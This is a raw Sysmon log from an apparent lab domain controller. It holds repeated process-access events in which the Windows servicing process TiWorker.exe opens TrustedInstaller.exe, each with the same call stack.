13:58:30.508{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.476{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.476{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.461{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.461{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.445{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.430{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.430{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.414{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.414{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.414{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1